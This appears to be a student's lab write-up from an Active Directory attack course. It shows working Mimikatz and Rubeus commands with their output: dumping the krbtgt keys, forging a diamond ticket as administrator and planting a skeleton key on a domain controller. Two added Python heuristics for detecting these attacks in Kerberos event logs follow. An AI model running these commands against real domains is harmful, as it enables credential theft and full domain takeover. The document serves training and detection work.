Learning Objective - 10

Creating a Diamond Ticket

PS C:\AD\Tools> Invoke-Mimikatz -Command '"lsadump::lsa /inject /name:krbtgt" "exit"' -Computername dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /inject /name:krbtgt
Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID  : 000001f6 (502)
User : krbtgt

 * Primary
    NTLM : 4e9815869d2090ccfca61c1fe0d23986
    LM   :
  Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
    ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
    lm  - 0: ea03581a1268674a828bde6ab09db837


 * Kerberos
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 150ea2e934ab6b80

 * Kerberos-Newer-Keys
    Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
      aes128_hmac       (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
      des_cbc_md5       (4096) : 150ea2e934ab6b80

 * NTLM-Strong-NTOWF
    Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

mimikatz(powershell) # exit
Bye!

Using the krbtgt aes256_hmac key, we create the ticket and spawn a shell.

PS C:\AD\Tools> .\Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /user:student723 /password:xxxxxxxxxxxxxx /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Diamond Ticket

[*] Showing process : True
[*] Username        : OCPBBF9Y
[*] Domain          : 2M2G4XL4
[*] Password        : 2WCYITLX
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 6388
[+] LUID            : 0x483ae62

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!]     AES256 Salt: DOLLARCORP.MONEYCORP.LOCALstudent723
[*] Using aes256_cts_hmac_sha1 hash: 8A55FB08BBBD0F30FEA2CEC44BF8548B4291230F6BFEE5107B45059484EAF75C
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\student723'
[*] Target LUID : 75738722
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

[*] Target LUID: 0x483ae62
[+] Ticket successfully imported!

[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):


[*] Target LUID: 0x483ae62
[+] Ticket successfully imported!

You can also use it without credentials by passing /tgtdeleg instead of /user and /password:

Rubeus.exe diamond /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

It works the same way :).
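From the defender's side, the Rubeus output above shows what a DC actually records: a 4768 (TGT issued) for student723, after which the rewritten TGT is presented as administrator. The following is an added detection heuristic, not part of the lab notes, that flags 4769 service-ticket requests with no preceding 4768 for the same account and client address; the event records, the field names and the 10-hour window are constructed assumptions.

```python
"""Heuristic for forged or rewritten TGTs (golden and diamond tickets).

A diamond ticket starts from a TGT the DC legitimately issued to one account
(student723) and rewrites its PAC for another (administrator). The DC therefore
has a 4768 for the low-privileged account only; the later 4769 events for
administrator come from the same client IP with no matching 4768.
"""
from datetime import datetime, timedelta

# Constructed sample of the minimal fields from Security events 4768/4769
# (not real logs). In a multi-DC domain, 4768s from every DC must be merged first.
EVENTS = [
    {"id": 4768, "account": "student723", "ip": "172.16.100.23", "time": "2024-02-26T00:43:09"},
    {"id": 4769, "account": "student723", "ip": "172.16.100.23", "time": "2024-02-26T00:43:15"},
    {"id": 4769, "account": "administrator", "ip": "172.16.100.23", "time": "2024-02-26T00:44:02"},
    {"id": 4768, "account": "administrator", "ip": "172.16.2.1", "time": "2024-02-26T00:50:00"},
    {"id": 4769, "account": "administrator", "ip": "172.16.2.1", "time": "2024-02-26T00:50:05"},
]

WINDOW = timedelta(hours=10)  # default TGT lifetime: a 4768 must precede the 4769 within it


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_orphan_tgs_requests(events, window=WINDOW):
    """Return 4769 events with no earlier 4768 for the same account and IP inside the window."""
    tgts = [e for e in events if e["id"] == 4768]
    suspicious = []
    for tgs in (e for e in events if e["id"] == 4769):
        backed = any(
            t["account"].lower() == tgs["account"].lower()
            and t["ip"] == tgs["ip"]
            and 0 <= (_ts(tgs) - _ts(t)).total_seconds() <= window.total_seconds()
            for t in tgts
        )
        if not backed:
            suspicious.append(tgs)
    return suspicious


def likely_source_accounts(events, orphan, window=WINDOW):
    """Accounts that did receive a TGT from the orphan's IP shortly before it:
    candidates for the ticket that was decrypted and rewritten."""
    return sorted({
        e["account"] for e in events
        if e["id"] == 4768 and e["ip"] == orphan["ip"]
        and 0 <= (_ts(orphan) - _ts(e)).total_seconds() <= window.total_seconds()
    })
```

Renewed tickets (4770) and TGTs issued by another DC are the usual sources of false positives, so run the check over the merged logs of all DCs.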

Skeleton Key

PS C:\AD\Tools> Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

Creating a session on any computer with the master password 'mimikatz':

PS C:\AD\Tools> Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp\administrator
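The skeleton key is an RC4 patch in LSASS on the DC, so logons with the master password are negotiated with RC4-HMAC (etype 0x17) even for accounts that otherwise use AES; the commonly recommended indicator is therefore an encryption-type downgrade in 4768 events. The block below is an added example, not the course's own material, that runs that check over constructed log records written in the style of the Security log message text; the record layout and the AES baseline rule are assumptions.

```python
"""Detect Skeleton Key use via Kerberos encryption-type downgrade in 4768 events.

Mitigation note: the patch needs write access to LSASS on the DC, which LSA
Protection (RunAsPPL) blocks without a kernel driver; the detection below is the
complementary control for DCs where that is not enforced.
"""
import re
from collections import defaultdict

# Constructed sample records (not real events), one blank-line separated block each.
SAMPLE_LOG = """\
EventID: 4768
Account Name: Administrator
Client Address: ::ffff:172.16.2.1
Ticket Encryption Type: 0x12

EventID: 4768
Account Name: Administrator
Client Address: ::ffff:172.16.100.23
Ticket Encryption Type: 0x17
"""

AES_TYPES = {0x11, 0x12}   # aes128-cts-hmac-sha1, aes256-cts-hmac-sha1
RC4 = 0x17                 # rc4-hmac, the only etype the skeleton key patch serves
FIELD = re.compile(r"^(EventID|Account Name|Client Address|Ticket Encryption Type): (.+)$", re.M)


def parse_records(text):
    """Turn the message-text records into dicts with a numeric 'etype' field."""
    records = []
    for block in text.strip().split("\n\n"):
        rec = dict(FIELD.findall(block))
        rec["etype"] = int(rec["Ticket Encryption Type"], 16)
        records.append(rec)
    return records


def find_rc4_downgrades(records):
    """Return (account, client) pairs where an account with an AES baseline was
    issued an RC4 TGT: the downgrade signature of a skeleton-key logon."""
    seen = defaultdict(set)
    for r in records:
        seen[r["Account Name"].lower()].add(r["etype"])
    hits = []
    for r in records:
        acct = r["Account Name"].lower()
        if r["EventID"] == "4768" and r["etype"] == RC4 and seen[acct] & AES_TYPES:
            hits.append((r["Account Name"], r["Client Address"]))
    return hits
```

Accounts that legitimately still use RC4 (legacy clients, msDS-SupportedEncryptionTypes unset) never reach the AES baseline and are not flagged; a hit from an AES-only account is worth an immediate look at LSASS on that DC.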

More info: page 157.
